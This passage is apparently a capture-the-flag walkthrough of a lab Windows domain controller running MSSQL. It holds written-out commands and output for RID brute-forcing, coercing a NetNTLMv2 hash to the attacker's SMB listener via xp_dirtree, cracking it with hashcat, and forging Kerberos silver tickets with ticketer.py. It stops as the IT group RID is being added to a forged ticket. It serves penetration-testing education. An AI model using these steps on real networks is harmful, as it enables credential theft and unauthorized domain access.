



Signed is an assume-breach Windows box where I’m given credentials for a local MSSQL account. I’ll enumerate the database, coerce authentication from the MSSQL service account using xp_dirtree, and crack the NetNTLMv2 hash. With the service account password, I’ll forge a silver ticket with the IT group’s RID to gain sysadmin privileges on the database and get command execution. For root, I’ll show three paths: using OPENROWSET BULK impersonation with silver tickets to read files as Domain Admins and find the Administrator’s password in PowerShell history; relaying NTLM authentication from the DC using a crafted DNS record; and recovering SeImpersonatePrivilege from the original logon token to escalate with GodPotato.





Box Info



Recon

Initial Scanning

nmap finds only one open TCP port, MSSQL (1433):

oxdf@hacky$ sudo nmap -p- -vvv --min-rate 10000 10.129.242.173

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-31 00:47 UTC

...[snip]...

Nmap scan report for DC01.signed.htb (10.129.242.173)

Host is up, received echo-reply ttl 127 (0.022s latency).

Scanned at 2026-01-31 00:47:34 UTC for 14s

Not shown: 65534 filtered tcp ports (no-response)

PORT STATE SERVICE REASON

1433/tcp open ms-sql-s syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

Raw packets sent: 131074 (5.767MB) | Rcvd: 2 (72B)

oxdf@hacky$ sudo nmap -p 1433 -sCV 10.129.242.173

Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-31 00:48 UTC

Nmap scan report for DC01.signed.htb (10.129.242.173)

Host is up (0.022s latency).

PORT STATE SERVICE VERSION

1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+

|_ms-sql-info: ERROR: Script execution failed (use -d to debug)

| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback

| Not valid before: 2026-01-30T16:34:41

|_Not valid after: 2056-01-30T16:34:41

|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)

|_ssl-date: 2026-01-31T00:48:33+00:00; -5s from scanner time.

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: -5s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds

nmap identifies the machine as running Windows with MSSQL Server 2022. The TLS certificate is the self-signed fallback (SSL_Self_Signed_Fallback), so it doesn’t leak a hostname.

The port shows a TTL of 127, which matches the expected TTL for Windows one hop away.
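The TTL reasoning can be sketched in a few lines of Python. This is only a rough heuristic: it assumes the common default initial TTLs (64 for Linux/Unix, 128 for Windows, 255 for many network devices), and `guess_from_ttl` is a hypothetical helper, not something nmap provides.

```python
# Common default initial TTLs (an assumption; hosts can be configured differently).
DEFAULT_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "network device"}

def guess_from_ttl(observed_ttl: int) -> tuple[str, int]:
    """Return (likely OS family, hop count) for an observed TTL."""
    # The smallest default TTL that is >= the observed value is the likely starting point.
    initial = min(t for t in DEFAULT_TTLS if t >= observed_ttl)
    return DEFAULT_TTLS[initial], initial - observed_ttl

print(guess_from_ttl(127))  # ('Windows', 1)
```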



Initial Credentials



HackTheBox provides the following scenario associated with Signed:

As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH

The creds do work, but only using --local-auth:

oxdf@hacky$ netexec mssql 10.129.242.173 -u scott -p 'Sm230#C5NatH'

MSSQL 10.129.242.173 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

MSSQL 10.129.242.173 1433 DC01 [-] SIGNED.HTB\scott:Sm230#C5NatH (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')

oxdf@hacky$ netexec mssql 10.129.242.173 -u scott -p 'Sm230#C5NatH' --local-auth

MSSQL 10.129.242.173 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

MSSQL 10.129.242.173 1433 DC01 [+] DC01\scott:Sm230#C5NatH

That means scott is a SQL Server login, as opposed to a Windows/domain account. --local-auth tells netexec to use SQL authentication rather than Windows integrated auth.

I’ll also note the hostname and domain and update my hosts file:

10.129.242.173 DC01.signed.htb signed.htb DC01



MSSQL - TCP 1433

Database

I’ll connect to MSSQL using mssqlclient.py from Impacket:

oxdf@hacky$ mssqlclient.py scott:'Sm230#C5NatH'@DC01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (scott guest@master)>

The @@version global variable shows the version:

SQL (scott guest@master)> select @@version;

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)

Oct 8 2022 05:58:25

Copyright (C) 2022 Microsoft Corporation

Enterprise Evaluation Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

The prompt shows that the scott login is mapped to the guest database user and that the current database is master. I can explicitly get more information about the logged in user:

SQL (scott guest@master)> select SUSER_SNAME(), ORIGINAL_LOGIN();

----- -----

scott scott

ORIGINAL_LOGIN() gives the user who authenticated to MSSQL, and SUSER_SNAME() gives the user mapped into the current security context. In this case, they are the same, but it is possible that logging in with one account will map to another user within MSSQL. To explicitly see permissions, I can check both the server and the database level permissions:

SQL (scott guest@master)> select * from fn_my_permissions(NULL, 'SERVER');

entity_name subentity_name permission_name

----------- -------------- -----------------

server CONNECT SQL

server VIEW ANY DATABASE

SQL (scott guest@master)> SELECT * FROM fn_my_permissions(NULL, 'DATABASE');

entity_name subentity_name permission_name

----------- -------------- -----------------------------------------

database CONNECT

database VIEW ANY COLUMN ENCRYPTION KEY DEFINITION

database VIEW ANY COLUMN MASTER KEY DEFINITION

The databases are just the default DBs:

SQL (scott guest@master)> SELECT name FROM sys.databases;

name

------

master

tempdb

model

msdb

Without any interesting data to look at, I’ll check for xp_cmdshell:

SQL (scott guest@master)> xp_cmdshell whoami

ERROR(DC01): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

SQL (scott guest@master)> enable_xp_cmdshell

ERROR(DC01): Line 105: User does not have permission to perform this action.

ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.

ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.

ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE state

It’s disabled, and scott doesn’t have permissions to enable it.

I’ll check for impersonation and linked servers, but neither shows anything interesting:

SQL (scott guest@master)> enum_impersonate

execute as database permission_name state_desc grantee grantor

---------- -------- --------------- ---------- ------- -------

SQL (scott guest@master)> enum_links

SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT

-------- ---------------- ----------- -------------- ------------------ ------------ -------

DC01 SQLNCLI SQL Server DC01 NULL NULL NULL

Linked Server Local Login Is Self Mapping Remote Login

------------- ----------- --------------- ------------

That output confirms the current server name, DC01, which I can also see with @@SERVERNAME:

SQL (scott guest@master)> select @@SERVERNAME;

----

DC01

Listing the logins, it’s just scott and the sa (admin) account:

SQL (scott guest@master)> enum_logins

name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin

----- --------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------

sa SQL_LOGIN 0 1 0 0 0 0 0 0 0

scott SQL_LOGIN 0 0 0 0 0 0 0 0 0

xp_dirtree will let me enumerate the filesystem. I can try to read the contents of C:\:

SQL (scott guest@master)> xp_dirtree "C:\"

subdirectory depth

------------ -----

It looks like scott can run the command, but doesn’t have permissions to read any of the files.

Domain Users

MSSQL provides a mechanism to get information about domain users. For example, I can look up the SID for the domain Administrator account:

SQL (scott guest@master)> SELECT SUSER_SID('SIGNED\Administrator');

-----------------------------------------------------------

b'0105000000000005150000005b7bb0f398aa2245ad4a1ca4f4010000'

I can also go the other way:

SQL (scott guest@master)> SELECT SUSER_SNAME(0x0105000000000005150000005b7bb0f398aa2245ad4a1ca4f4010000);

--------------------

SIGNED\Administrator

This SID is in binary format, with the RID stored in the last four bytes as a little-endian integer: f4010000 is 0x000001f4, or 500. If I want to see who has RID 501 (f5010000), MSSQL will show:

SQL (scott guest@master)> SELECT SUSER_SNAME(0x0105000000000005150000005b7bb0f398aa2245ad4a1ca4f5010000);

------------

SIGNED\Guest
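Doing these lookups by hand gets tedious, so here is a minimal Python sketch of the byte-swapping involved. The domain prefix comes from the SUSER_SID() output above; the helper names `sid_hex_for_rid` and `rid_from_sid_hex` are my own and only illustrative.

```python
import struct

# Domain SID prefix in binary form, taken from the SUSER_SID() output above
# (everything except the final 4-byte RID).
DOMAIN_SID_HEX = "0105000000000005150000005b7bb0f398aa2245ad4a1ca4"

def sid_hex_for_rid(rid: int) -> str:
    """Append the RID as a little-endian 32-bit integer to the domain prefix."""
    return DOMAIN_SID_HEX + struct.pack("<I", rid).hex()

def rid_from_sid_hex(sid_hex: str) -> int:
    """Read the RID back out of the last four bytes of a binary SID."""
    return struct.unpack("<I", bytes.fromhex(sid_hex)[-4:])[0]

# Generate lookup queries for a small RID range.
for rid in range(500, 503):
    print(f"SELECT SUSER_SNAME(0x{sid_hex_for_rid(rid)});")
```

Each printed query can be pasted into the mssqlclient.py session. Looping over a larger range is essentially a manual RID brute force.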

Thankfully, netexec has a --rid-brute option that will dump users:

oxdf@hacky$ netexec mssql 10.129.242.173 -u scott -p 'Sm230#C5NatH' --local-auth --rid-brute

MSSQL 10.129.242.173 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

MSSQL 10.129.242.173 1433 DC01 [+] DC01\scott:Sm230#C5NatH

MSSQL 10.129.242.173 1433 DC01 498: SIGNED\Enterprise Read-only Domain Controllers

MSSQL 10.129.242.173 1433 DC01 500: SIGNED\Administrator

MSSQL 10.129.242.173 1433 DC01 501: SIGNED\Guest

MSSQL 10.129.242.173 1433 DC01 502: SIGNED\krbtgt

MSSQL 10.129.242.173 1433 DC01 512: SIGNED\Domain Admins

MSSQL 10.129.242.173 1433 DC01 513: SIGNED\Domain Users

MSSQL 10.129.242.173 1433 DC01 514: SIGNED\Domain Guests

MSSQL 10.129.242.173 1433 DC01 515: SIGNED\Domain Computers

MSSQL 10.129.242.173 1433 DC01 516: SIGNED\Domain Controllers

MSSQL 10.129.242.173 1433 DC01 517: SIGNED\Cert Publishers

MSSQL 10.129.242.173 1433 DC01 518: SIGNED\Schema Admins

MSSQL 10.129.242.173 1433 DC01 519: SIGNED\Enterprise Admins

MSSQL 10.129.242.173 1433 DC01 520: SIGNED\Group Policy Creator Owners

MSSQL 10.129.242.173 1433 DC01 521: SIGNED\Read-only Domain Controllers

MSSQL 10.129.242.173 1433 DC01 522: SIGNED\Cloneable Domain Controllers

MSSQL 10.129.242.173 1433 DC01 525: SIGNED\Protected Users

MSSQL 10.129.242.173 1433 DC01 526: SIGNED\Key Admins

MSSQL 10.129.242.173 1433 DC01 527: SIGNED\Enterprise Key Admins

MSSQL 10.129.242.173 1433 DC01 553: SIGNED\RAS and IAS Servers

MSSQL 10.129.242.173 1433 DC01 571: SIGNED\Allowed RODC Password Replication Group

MSSQL 10.129.242.173 1433 DC01 572: SIGNED\Denied RODC Password Replication Group

MSSQL 10.129.242.173 1433 DC01 1000: SIGNED\DC01$

MSSQL 10.129.242.173 1433 DC01 1101: SIGNED\DnsAdmins

MSSQL 10.129.242.173 1433 DC01 1102: SIGNED\DnsUpdateProxy

MSSQL 10.129.242.173 1433 DC01 1103: SIGNED\mssqlsvc

MSSQL 10.129.242.173 1433 DC01 1104: SIGNED\HR

MSSQL 10.129.242.173 1433 DC01 1105: SIGNED\IT

MSSQL 10.129.242.173 1433 DC01 1106: SIGNED\Finance

MSSQL 10.129.242.173 1433 DC01 1107: SIGNED\Developers

MSSQL 10.129.242.173 1433 DC01 1108: SIGNED\Support

MSSQL 10.129.242.173 1433 DC01 1109: SIGNED\oliver.mills

MSSQL 10.129.242.173 1433 DC01 1110: SIGNED\emma.clark

MSSQL 10.129.242.173 1433 DC01 1111: SIGNED\liam.wright

MSSQL 10.129.242.173 1433 DC01 1112: SIGNED\noah.adams

MSSQL 10.129.242.173 1433 DC01 1113: SIGNED\ava.morris

MSSQL 10.129.242.173 1433 DC01 1114: SIGNED\sophia.turner

MSSQL 10.129.242.173 1433 DC01 1115: SIGNED\james.morgan

MSSQL 10.129.242.173 1433 DC01 1116: SIGNED\mia.cooper

MSSQL 10.129.242.173 1433 DC01 1117: SIGNED\elijah.brooks

MSSQL 10.129.242.173 1433 DC01 1118: SIGNED\isabella.evans

MSSQL 10.129.242.173 1433 DC01 1119: SIGNED\lucas.murphy

MSSQL 10.129.242.173 1433 DC01 1120: SIGNED\william.johnson

MSSQL 10.129.242.173 1433 DC01 1121: SIGNED\charlotte.price

MSSQL 10.129.242.173 1433 DC01 1122: SIGNED\henry.bennett

MSSQL 10.129.242.173 1433 DC01 1123: SIGNED\amelia.kelly

MSSQL 10.129.242.173 1433 DC01 1124: SIGNED\jackson.gray

MSSQL 10.129.242.173 1433 DC01 1125: SIGNED\harper.diaz

MSSQL 10.129.242.173 1433 DC01 1126: SIGNED\SQLServer2005SQLBrowserUser$DC01

Auth as mssqlsvc

Coerce Hash

I’m going to use xp_dirtree to try to list a directory from an SMB share I control. That will cause MSSQL to try to authenticate to my share (using the service account that MSSQL is running under), where I can capture the NetNTLMv2 challenge / response (hash) and try to crack it. I’ll start Responder:

oxdf@hacky$ sudo uv run Responder.py -I tun0

...[snip]...

[+] Generic Options:

Responder NIC [tun0]

Responder IP [10.10.14.16]

Responder IPv6 [dead:beef:2::100e]

Challenge set [random]

Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:

Responder Machine Name [WIN-DIOQQ6Y3BSS]

Responder Domain Name [BB40.LOCAL]

Responder DCE-RPC Port [49815]

[+] Listening for events...

And now I’ll try to list a directory from an SMB share on my host:

SQL (scott guest@master)> xp_dirtree \\10.10.14.16\share

subdirectory depth file

------------ ----- ----

There’s a hash in Responder:

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.129.242.173

[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc

[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:ddecccf61cda2e75:0BC9A74AF8C16AA73A838979E707BCD7:0101000000000000807B86014D92DC012D7962B0DEE159A80000000002000800420042003400300001001E00570049004E002D00440049004F005100510036005900330042005300530004003400570049004E002D00440049004F00510051003600590033004200530053002E0042004200340030002E004C004F00430041004C000300140042004200340030002E004C004F00430041004C000500140042004200340030002E004C004F00430041004C0007000800807B86014D92DC010600040002000000080030003000000000000000000000000030000040354681DD95D3E78F8B299933F8B5531267AE1A692342562A0BFFE870919C8C0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310036000000000000000000
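It helps to know what is in that line before cracking it. In NTLMv2, the client's proof (the NTProofStr) is an HMAC-MD5 over the server challenge plus the client blob, keyed with a value derived from the NT hash, so everything needed to test password guesses offline is in this one line. A small sketch that splits the fields apart, where `parse_netntlmv2` is a hypothetical helper and the blob is truncated to keep the example short:

```python
def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat mode 5600 line: user::domain:challenge:ntproofstr:blob."""
    user, _, domain, challenge, ntproof, blob = line.strip().split(":")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": bytes.fromhex(challenge),  # 8 bytes chosen by Responder
        "nt_proof_str": bytes.fromhex(ntproof),        # 16-byte HMAC-MD5 output
        "blob": bytes.fromhex(blob),                   # client blob (timestamp, target info, ...)
    }

# The blob is truncated to its first 8 bytes here; use the full line in practice.
sample = "mssqlsvc::SIGNED:ddecccf61cda2e75:0BC9A74AF8C16AA73A838979E707BCD7:0101000000000000"
fields = parse_netntlmv2(sample)
print(fields["user"], fields["domain"],
      len(fields["server_challenge"]), len(fields["nt_proof_str"]))
```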







Crack NetNTLMv2

I’ll save that to a file and pass it to hashcat:

$ hashcat ./mssqlsvc.hash rockyou.txt

hashcat (v7.1.2) starting in autodetect mode

...[snip]...

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.

The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

...[snip]...

MSSQLSVC::SIGNED:ddecccf61cda2e75:0bc9a74af8c16aa73a838979e707bcd7:0101000000000000807b86014d92dc012d7962b0dee159a80000000002000800420042003400300001001e00570049004e002d00440049004f005100510036005900330042005300530004003400570049004e002d00440049004f00510051003600590033004200530053002e0042004200340030002e004c004f00430041004c000300140042004200340030002e004c004f00430041004c000500140042004200340030002e004c004f00430041004c0007000800807b86014d92dc010600040002000000080030003000000000000000000000000030000040354681dd95d3e78f8b299933f8b5531267ae1a692342562a0bffe870919c8c0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310036000000000000000000:purPLE9795!@

...[snip]...

It cracked to “purPLE9795!@” in less than five seconds on my host.

This password works for MSSQL using Windows (domain) authentication, but not with --local-auth:

oxdf@hacky$ netexec mssql DC01.signed.htb -u mssqlsvc -p 'purPLE9795!@' --local-auth

MSSQL 10.129.242.173 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

MSSQL 10.129.242.173 1433 DC01 [-] DC01\mssqlsvc:purPLE9795!@ (Login failed for user 'mssqlsvc'. Please try again with or without '--local-auth')

oxdf@hacky$ netexec mssql DC01.signed.htb -u mssqlsvc -p 'purPLE9795!@'

MSSQL 10.129.242.173 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:SIGNED.HTB)

MSSQL 10.129.242.173 1433 DC01 [+] SIGNED.HTB\mssqlsvc:purPLE9795!@

Shell as MSSQL

Enumeration

I can connect with mssqlclient.py, this time with the -windows-auth flag to log in as a domain account over Windows integrated authentication:

oxdf@hacky$ mssqlclient.py mssqlsvc:'purPLE9795!@'@DC01.signed.htb -windows-auth

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (SIGNED\mssqlsvc guest@master)>

It is still showing guest privileges. This account is not an admin:

SQL (SIGNED\mssqlsvc guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');

-

0

There is some impersonation set up:

SQL (SIGNED\mssqlsvc guest@master)> enum_impersonate

execute as database permission_name state_desc grantee grantor

---------- -------- --------------- ---------- -------- ----------------------------

b'USER' msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser

dc_admin has been granted IMPERSONATE permission on the MS_DataCollectorInternalUser user in the msdb database. MS_DataCollectorInternalUser is a built-in high-privilege account in msdb. The problem is that dc_admin doesn’t exist as a database user in msdb:

SQL (SIGNED\mssqlsvc guest@master)> enum_logins

name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin

--------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------

sa SQL_LOGIN 0 1 0 0 0 0 0 0 0

##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0

##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0

SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0

NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0

NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0

NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0

NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0

NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0

NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0

scott SQL_LOGIN 0 0 0 0 0 0 0 0 0

SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0

That makes this a bit of a dead end, at least for now. However, the enum_logins output shows more logins than scott was able to see. In addition to sa, four NT SERVICE accounts have sysadmin privileges, as does one group, SIGNED\IT.

Silver Ticket

Background

A silver ticket is a forged Kerberos service ticket (TGS) created using the NTLM hash of a service account. Unlike a golden ticket (which forges a TGT using the krbtgt hash), a silver ticket targets a specific service. In this case, because I have the password of the mssqlsvc account (from which the NTLM hash is trivial to calculate), I can craft service tickets for the MSSQL service.

TGS as mssqlsvc

I’ll start by proving I can forge a ticket for a user I know, mssqlsvc. To create a ticket, I’ll need:

- The NTLM hash of the service account password.

- The domain SID.

To get the NTLM, I’ll use Python with the plaintext password:

oxdf@hacky$ python3 -c 'import hashlib; print(hashlib.new("md4", "purPLE9795!@".encode("utf-16le")).hexdigest())'

ef699384c3285c54128a3ee1ddb1a0cc
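One caveat with that one-liner: on systems where Python is built against OpenSSL 3 without the legacy provider, `hashlib.new("md4")` can fail with an unsupported hash type error. As a fallback, here is a pure-Python MD4 sketch following RFC 1320. It's meant for one-off hashes like this, not performance, and the `md4` and `nt_hash` names are my own.

```python
import struct

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), for systems where hashlib lacks md4."""
    mask = 0xFFFFFFFF

    def rol(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & mask

    # Pad to 56 mod 64 bytes, then append the bit length as a 64-bit little-endian int.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    # Per round: (boolean function, additive constant, word order, shift amounts).
    rounds = [
        (lambda b, c, d: (b & c) | (~b & d), 0x00000000,
         tuple(range(16)), (3, 7, 11, 19)),
        (lambda b, c, d: (b & c) | (b & d) | (c & d), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda b, c, d: b ^ c ^ d, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    ]

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rol((a + func(b, c, d) + x[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate register roles for the next step
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16le")).hex()

print(nt_hash("purPLE9795!@"))
```

This should print the same value as the hashlib version above.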

To get the domain SID, I’ll fetch a SID from the DB:

SQL (SIGNED\mssqlsvc guest@master)> SELECT SUSER_SID('SIGNED\Domain Users');

-----------------------------------------------------------

b'0105000000000005150000005b7bb0f398aa2245ad4a1ca401020000'

The raw SID is a binary structure in which each sub-authority is stored as a little-endian 32-bit integer (the 6-byte identifier authority is big-endian). Here’s how to parse it:

| Bytes | Field | Value |
|---|---|---|
| 01 | Revision | 1 |
| 05 | Sub-authority count | 5 |
| 000000000005 | Identifier authority | 5 (NT Authority) |
| 15000000 | Sub-auth 1 | 0x00000015 = 21 |
| 5b7bb0f3 | Sub-auth 2 | 0xf3b07b5b = 4088429403 |
| 98aa2245 | Sub-auth 3 | 0x4522aa98 = 1159899800 |
| ad4a1ca4 | Sub-auth 4 | 0xa41c4aad = 2753317549 |
| 01020000 | Sub-auth 5 | 0x00000201 = 513 (Domain Users RID) |

Putting that all together makes S-1-5-21-4088429403-1159899800-2753317549-513, and the domain SID will be that without the RID at the end: S-1-5-21-4088429403-1159899800-2753317549.

Python can do this using the SID class from Impacket:

>>> from impacket.dcerpc.v5.dtypes import SID

>>> SID(bytes.fromhex('0105000000000005150000005b7bb0f398aa2245ad4a1ca401020000')).formatCanonical()

'S-1-5-21-4088429403-1159899800-2753317549-513'
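If Impacket isn't handy, the same conversion is short enough to do with the standard library. This is a minimal sketch of the parsing described above (`sid_to_string` is my own helper name), which also strips the RID to get the domain SID:

```python
import struct

def sid_to_string(raw: bytes) -> str:
    """Convert a binary Windows SID to its S-R-I-S... string form."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")  # 6 bytes, big-endian
    # Each sub-authority is a little-endian unsigned 32-bit integer.
    subs = struct.unpack(f"<{count}I", raw[8:8 + 4 * count])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])

raw = bytes.fromhex("0105000000000005150000005b7bb0f398aa2245ad4a1ca401020000")
full_sid = sid_to_string(raw)
domain_sid = full_sid.rsplit("-", 1)[0]  # drop the trailing RID
print(full_sid)
print(domain_sid)
```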

Putting that together forges a ticket:

oxdf@hacky$ ticketer.py -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 mssqlsvc

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos

[*] Customizing ticket for signed.htb/mssqlsvc

[*] PAC_LOGON_INFO

[*] PAC_CLIENT_INFO_TYPE

[*] EncTicketPart

[*] EncTGSRepPart

[*] Signing/Encrypting final ticket

[*] PAC_SERVER_CHECKSUM

[*] PAC_PRIVSVR_CHECKSUM

[*] EncTicketPart

[*] EncTGSRepPart

[*] Saving ticket in mssqlsvc.ccache

I can use that to connect to MSSQL:

oxdf@hacky$ KRB5CCNAME=mssqlsvc.ccache mssqlclient.py -no-pass -k DC01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (SIGNED\mssqlsvc guest@master)>

The session is running as the mssqlsvc user:

SQL (SIGNED\mssqlsvc guest@master)> select SUSER_SNAME(), ORIGINAL_LOGIN();

------------------- -------------------

SIGNED.HTB\mssqlsvc SIGNED.HTB\mssqlsvc

TGS as Administrator [Fail]

I can do the same thing to make a ticket as Administrator:

oxdf@hacky$ ticketer.py -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 Administrator

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos

[*] Customizing ticket for signed.htb/Administrator

[*] PAC_LOGON_INFO

[*] PAC_CLIENT_INFO_TYPE

[*] EncTicketPart

[*] EncTGSRepPart

[*] Signing/Encrypting final ticket

[*] PAC_SERVER_CHECKSUM

[*] PAC_PRIVSVR_CHECKSUM

[*] EncTicketPart

[*] EncTGSRepPart

[*] Saving ticket in Administrator.ccache

oxdf@hacky$ KRB5CCNAME=Administrator.ccache mssqlclient.py -no-pass -k DC01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (SIGNED\Administrator guest@master)> select SUSER_SNAME(), ORIGINAL_LOGIN();

------------------------ ------------------------

SIGNED.HTB\Administrator SIGNED.HTB\Administrator

Unfortunately, as shown above, the database is set up so that the Administrator user doesn’t have any useful privileges.

TGS with IT Group

The IT group has sysadmin privileges on the database. When a user requests access to a service over Kerberos, the DC generates a service ticket containing the user’s information, including their group memberships, and encrypts it with a key derived from the password of the service account that will receive it (the NTLM hash, for RC4). Because I’m forging the silver ticket with that same NTLM hash, I can put whatever groups I want into it.

I’ll get the SID for the IT group:

SQL (SIGNED\Administrator guest@master)> select SUSER_SID('Signed\IT')

-----------------------------------------------------------

b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'

That’s RID 1105:

oxdf@hacky$ python -c 'print(0x451)'

1105

I’ll add -groups 1105 to the ticket:

